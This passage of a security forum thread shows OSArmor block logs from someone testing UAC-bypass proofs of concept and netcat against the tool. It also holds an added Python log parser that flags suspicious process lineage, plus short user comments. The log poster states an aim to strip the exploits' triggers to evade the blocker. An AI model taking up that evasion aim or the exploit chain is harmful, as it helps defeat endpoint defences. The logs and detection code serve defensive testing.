    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:13
    Process: [3828]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:14
    Process: [4024]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:15
    Process: [1800]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:16
    Process: [3316]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:17
    Process: [836]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:18
    Process: [3472]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:19
    Process: [1492]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:20
    Process: [1116]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:21
    Process: [608]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:22
    Process: [3084]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:23
    Process: [2880]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:24
    Process: [1548]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:25
    Process: [1624]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:25
    Process: [3488]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:26
    Process: [3872]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:27
    Process: [2460]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:27
    Process: [1172]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:28
    Process: [3292]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:29
    Process: [3416]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:29
    Process: [3540]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:31
    Process: [1452]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:32
    Process: [624]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:33
    Process: [3260]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:34
    Process: [2292]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:34
    Process: [1976]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:34
    Process: [2252]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:35
    Process: [3936]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:35
    Process: [3308]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:35
    Process: [3940]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:35
    Process: [3000]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:36
    Process: [3372]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:36
    Process: [3696]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:36
    Process: [3660]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:37
    Process: [3656]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:37
    Process: [3008]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:37
    Process: [3176]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:38
    Process: [1604]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:38
    Process: [2232]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:39
    Process: [1548]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:39
    Process: [2460]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:39
    Process: [1172]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:39
    Process: [3284]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:40
    Process: [2084]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:40
    Process: [1032]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:40
    Process: [296]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:41
    Process: [2528]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:41
    Process: [2488]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:41
    Process: [2640]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:42
    Process: [3756]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:42
    Process: [2288]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:42
    Process: [3536]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:43
    Process: [3472]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:43
    Process: [2852]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:43
    Process: [3428]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:44
    Process: [1548]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:44
    Process: [2084]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:44
    Process: [3540]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 01:59:45
    Process: [3180]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1080 02F5FE10
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 02:00:01
    Process: [2520]C:\Windows\System32\UserAccountControlSettings.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: "C:\Windows\system32\UserAccountControlSettings.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:00:05
    Process: [3756]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 1112 00517C40
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 02:00:09
    Process: [800]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 386 0165B538
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 02:00:10
    Process: [1432]C:\Windows\System32\consent.exe
    Parent: [1036]C:\Windows\System32\svchost.exe
    Rule: CustomBlockRule
    Rule Name: Custom process-block rule via CustomBlock.db
    Command Line: consent.exe 1036 386 0165B538
    Signer: Microsoft Windows
    Parent Signer:
    
    Date/Time: 18/01/2018 02:13:20
    Process: [3828]C:\Users\BlackBox\Desktop\package.exe
    Parent: [1752]C:\Windows\System32\cmd.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: package  Matrix
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:13:46
    Process: [2820]C:\Users\BlackBox\Desktop\package.exe
    Parent: [1752]C:\Windows\System32\cmd.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: package  Matrix
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:18:03
    Process: [1900]C:\Users\BlackBox\Desktop\package.exe
    Parent: [1752]C:\Windows\System32\cmd.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: package  installer.exe
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:18:15
    Process: [4036]C:\Users\BlackBox\Desktop\package.exe
    Parent: [1752]C:\Windows\System32\cmd.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: package  installer.exe
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:18:29
    Process: [3872]C:\Users\BlackBox\Desktop\package.exe
    Parent: [1752]C:\Windows\System32\cmd.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: package  installer.exe
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:19:11
    Process: [3936]C:\Users\BlackBox\Desktop\package.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockUnsignedProcessesOnDesktop
    Rule Name: Block execution of unsigned processes on Desktop folder
    Command Line: "C:\Users\BlackBox\Desktop\package.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:20:04
    Process: [1172]C:\Windows\System32\sdclt.exe
    Parent: [3424]C:\Users\BlackBox\Desktop\package.exe
    Rule: BlockSdcltExecution
    Rule Name: Block execution of sdclt.exe (Windows Backups)
    Command Line: "C:\Windows\System32\sdclt.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:23:05
    Process: [3372]C:\Windows\System32\sdclt.exe
    Parent: [324]C:\Users\BlackBox\Desktop\package.exe
    Rule: BlockSdcltExecution
    Rule Name: Block execution of sdclt.exe (Windows Backups)
    Command Line: "C:\Windows\System32\sdclt.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:24:01
    Process: [3280]C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe
    Parent: [3828]C:\Users\BlackBox\Desktop\exploit.exe
    Rule: BlockUnsignedProcessesAppDataLocal
    Rule Name: Block execution of unsigned processes on Local AppData
    Command Line: "C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\perl.exe" C:\Users\BlackBox\AppData\Local\Temp\7ZipSfx.009\Perl_Exploit\bin\update.pl
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:35:59
    Process: [3040]C:\Windows\System32\sdclt.exe
    Parent: [3540]C:\Users\BlackBox\Desktop\package.exe
    Rule: BlockSdcltExecution
    Rule Name: Block execution of sdclt.exe (Windows Backups)
    Command Line: "C:\Windows\System32\sdclt.exe"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:36:49
    Process: [3004]C:\Windows\System32\wscript.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockVbsScripts
    Rule Name: Block execution of .vbs scripts
    Command Line: "C:\Windows\System32\WScript.exe" "C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\POC.vbs"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 02:37:33
    Process: [3284]C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\AdvancedRun.exe
    Parent: [3932]C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\POC.exe
    Rule: BlockProcessesReatedToNirSofer
    Rule Name: Block execution of any process related to NirSoft
    Command Line: "C:\Users\BlackBox\Desktop\New Projects\UAC Bypass Exploit 2\AdvancedRun.exe" /run
    Signer: Nir Sofer
    Parent Signer:
    
    Date/Time: 18/01/2018 02:40:23
    Process: [2888]C:\Windows\System32\wscript.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockVbsScripts
    Rule Name: Block execution of .vbs scripts
    Command Line: "C:\Windows\System32\WScript.exe" "C:\Users\BlackBox\Desktop\POC.vbs"
    Signer:
    Parent Signer:
    
    Date/Time: 18/01/2018 03:10:37
    Process: [1896]C:\ProgramData\nc.exe
    Parent: [1820]C:\Windows\explorer.exe
    Rule: BlockProcessesOnSuspiciousFolders
    Rule Name: Block processes located in suspicious folders
    Command Line: "C:\ProgramData\nc.exe"
    Signer:
    Parent Signer:
    
    Now to fix my exploits by removing the triggers so that OSArmor will not block them.
     
    Last edited by a moderator: Jan 17, 2018
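A small Python script for the block-log layout posted above, added here as an editor's example; it is not part of the original post and not code from NoVirusThanks. It parses entries in that "Date/Time / Process / Parent / Rule / ... / Parent Signer" layout, counts blocks per rule and image, flags the retry burst that appears when an on-demand system component such as consent.exe is put in CustomBlock.db, and flags a Windows-directory binary (sdclt.exe in the log above) launched by an unsigned parent sitting in a user-writable folder. The four embedded sample entries are constructed from the posted ones (PIDs and timestamps illustrative); the 30-second window, the threshold of three, and the list of user-writable path fragments are assumptions chosen for the example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample in the block-log layout posted in this thread; the four entries
# are modelled on the ones above, with illustrative PIDs and timestamps.
SAMPLE_LOG = r"""
Date/Time: 18/01/2018 01:59:23
Process: [2880]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:24
Process: [1548]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 01:59:25
Process: [1624]C:\Windows\System32\consent.exe
Parent: [1036]C:\Windows\System32\svchost.exe
Rule: CustomBlockRule
Rule Name: Custom process-block rule via CustomBlock.db
Command Line: consent.exe 1036 1080 02F5FE10
Signer: Microsoft Windows
Parent Signer:

Date/Time: 18/01/2018 02:20:04
Process: [1172]C:\Windows\System32\sdclt.exe
Parent: [3424]C:\Users\BlackBox\Desktop\package.exe
Rule: BlockSdcltExecution
Rule Name: Block execution of sdclt.exe (Windows Backups)
Command Line: "C:\Windows\System32\sdclt.exe"
Signer:
Parent Signer:
"""

PROC_RE = re.compile(r"^\[(\d+)\](.+)$")   # OSArmor writes "[pid]path"
TIME_FMT = "%d/%m/%Y %H:%M:%S"   # locale-dependent; US-locale logs need "%m/%d/%Y %I:%M:%S %p"
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")   # assumed list for the example


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_events(log):
    """One dict per blank-line-separated entry, with PID and path split out."""
    events = []
    for chunk in re.split(r"\n\s*\n", log.strip()):
        fields = {}
        for line in chunk.splitlines():
            key, _, value = line.strip().partition(":")
            fields[key.strip()] = value.strip()
        for side in ("Process", "Parent"):
            m = PROC_RE.match(fields.get(side, ""))
            fields[side + " PID"] = int(m.group(1)) if m else None
            fields[side + " Path"] = m.group(2) if m else fields.get(side, "")
        fields["Time"] = datetime.strptime(fields["Date/Time"], TIME_FMT)
        events.append(fields)
    return events


def summarise(events):
    """How many times each (rule, image name) pair fired."""
    return Counter((e["Rule"], basename(e["Process Path"])) for e in events)


def block_storms(events, window=timedelta(seconds=30), threshold=3):
    """Same image blocked >= threshold times under the same parent PID within `window`:
    consent.exe is started by the AppInfo service (hosted in svchost.exe) for every
    elevation request, so a CustomBlock rule on it yields a burst of entries, not one."""
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["Process Path"].lower(), e["Parent PID"])].append(e["Time"])
    storms = []
    for (path, ppid), times in by_key.items():
        times.sort()
        if any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1)):
            storms.append((path, ppid, len(times)))
    return storms


def suspicious_lineage(events):
    """Windows-directory binary started by an unsigned parent in a user-writable path,
    the pattern behind the sdclt.exe blocks above; returns (child, parent, rule)."""
    hits = []
    for e in events:
        child, parent = e["Process Path"].lower(), e["Parent Path"].lower()
        if (child.startswith("c:\\windows\\") and not e.get("Parent Signer")
                and any(tag in parent for tag in USER_WRITABLE)):
            hits.append((basename(child), basename(parent), e["Rule"]))
    return hits
```

Paste the entries copied from the OSArmor block popup or log file into SAMPLE_LOG (or read them from a file) and call parse_events, summarise, block_storms and suspicious_lineage on the result. The storm check is the practical one when building a CustomBlock.db: a burst of identical blocks under one parent PID usually means the rule is fighting a service that relaunches the blocked image, which is noise rather than an attack.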
  23. bjm_

    bjm_ Registered Member

    Joined:
    May 22, 2009
    Posts:
    4,457
    Location:
    .
    ERP 3.1 recognizes my Run Sandboxed files w/wo Full Access *\mailslot\NVTInj\*.
    OSA before (test25) sometimes recognized my Run Sandboxed files #653.
    2272.png

    Suspicious Process Blocked 2.png

    #664, #445
    FWIW ~ YMMV
     
    Last edited: Jan 19, 2018
  24. I can't wait for test26, bring it on! OSArmor works better than SOB, WOW! Security fixes are implemented and I really like most of the security features, including blocking Desktop (unchecked for testing malware)!

    Security Fixes:
    1. New rule like "Block non-system and unsigned processes on Windows folder and System folder".

